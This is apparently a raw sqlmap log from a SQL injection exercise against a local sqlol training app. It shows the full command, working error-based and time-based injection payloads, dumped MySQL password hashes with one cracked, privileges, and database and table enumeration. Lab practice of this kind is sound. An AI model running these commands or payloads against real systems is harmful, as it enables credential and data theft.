=================================================================================
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=low&sanitization_type=keyword&sanitization_params=union%2Cselect%2Cwhere%2Cand%2Cor%2C--%2C%23&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --users -passwords --privileges --roles --dbs --tables --columns --risk=2 --level=3

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for MySQL extending provided level (3) and risk (2) values? [Y/n] n
GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
what dictionary do you want to use? 1 (default dictionary)
do you want to use common password suffixes? (slow!) [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 512 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: sanitization_level=low&sanitization_type=keyword&sanitization_params=union,select,where,and,or,--,#&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND EXTRACTVALUE(3082,CONCAT(0x5c,0x716a6b7871,(SELECT (ELT(3082=3082,1))),0x7162787a71)) AND 'ZrIH'='ZrIH&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=low&sanitization_type=keyword&sanitization_params=union,select,where,and,or,--,#&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND (SELECT 5453 FROM (SELECT(SLEEP(5)))hKLV) AND 'CJvA'='CJvA&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.1
database management system users [4]:
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'
[*] 'vernersmednis'@'localhost'

database management system users password hashes:
[*] mysql.session [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] mysql.sys [1]:
    password hash: *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[*] root [1]:
    password hash: *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[*] vernersmednis [1]:
    password hash: *AEF2EF67855EDBE6535529298973B41445CE2225

database management system users privileges:
[*] 'mysql.session'@'localhost' (administrator) [1]:
    privilege: SUPER
[*] 'mysql.sys'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
	...
[*] 'vernersmednis'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
	...

database management system users roles:
[*] 'mysql.session'@'localhost' (administrator) [1]:
    role: SUPER
[*] 'mysql.sys'@'localhost' [1]:
    role: USAGE
[*] 'root'@'localhost' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
	...
[*] 'vernersmednis'@'localhost' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
	...

available databases [11]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] santab2b
[*] security
[*] sqlol
[*] sys
[*] trainingdatabase
[*] world

Database: information_schema
[61 tables]
+------------------------------------------------------+
| CHARACTER_SETS                                       |
| COLLATIONS                                           |
| COLLATION_CHARACTER_SET_APPLICABILITY                |
| ...                                                  |
+------------------------------------------------------+

Database: challenges
[1 table]
+------------------------------------------------------+
| nrgmlp5pke                                           |
+------------------------------------------------------+

Database: mysql
[31 tables]
+------------------------------------------------------+
| event                                                |
| plugin                                               |
| user                                                 |
| ...                                                  |
+------------------------------------------------------+

Database: performance_schema
[87 tables]
+------------------------------------------------------+
| hosts                                                |
| accounts                                             |
| cond_instances                                       |
| ...                                                  |
+------------------------------------------------------+

Database: sakila
[23 tables]
+------------------------------------------------------+
| language                                             |
| actor                                                |
| actor_info                                           |
| ...                                                  |
+------------------------------------------------------+

Database: santab2b
[1132 tables]
+------------------------------------------------------+
| format                                               |
| abstractbundler6307sn                                |
| abstractbundlerules                                  |
| ...                                                  |
+------------------------------------------------------+

Database: security
[4 tables]
+------------------------------------------------------+
| emails                                               |
| referers                                             |
| uagents                                              |
| users                                                |
+------------------------------------------------------+

Database: sqlol
[2 tables]
+------------------------------------------------------+
| ssn                                                  |
| users                                                |
+------------------------------------------------------+

Database: sys
[101 tables]
+------------------------------------------------------+
| processlist                                          |
| session                                              |
| version                                              |
| ...                                                  |
+------------------------------------------------------+

Database: trainingdatabase
[1224 tables]
+------------------------------------------------------+
| junit_numberseries                                   |
| tasks_aux_queue                                      |
| tasks_aux_scheduler                                  |
| ...                                                  |
+------------------------------------------------------+

Database: world
[3 tables]
+------------------------------------------------------+
| city                                                 |
| country                                              |
| countrylanguage                                      |
+------------------------------------------------------+

Database: sqlol
Table: ssn
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| name   | varchar(50) |
| ssn    | varchar(11) |
+--------+-------------+

Database: sqlol
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| isadmin  | int(11)     |
| username | varchar(50) |
+----------+-------------+

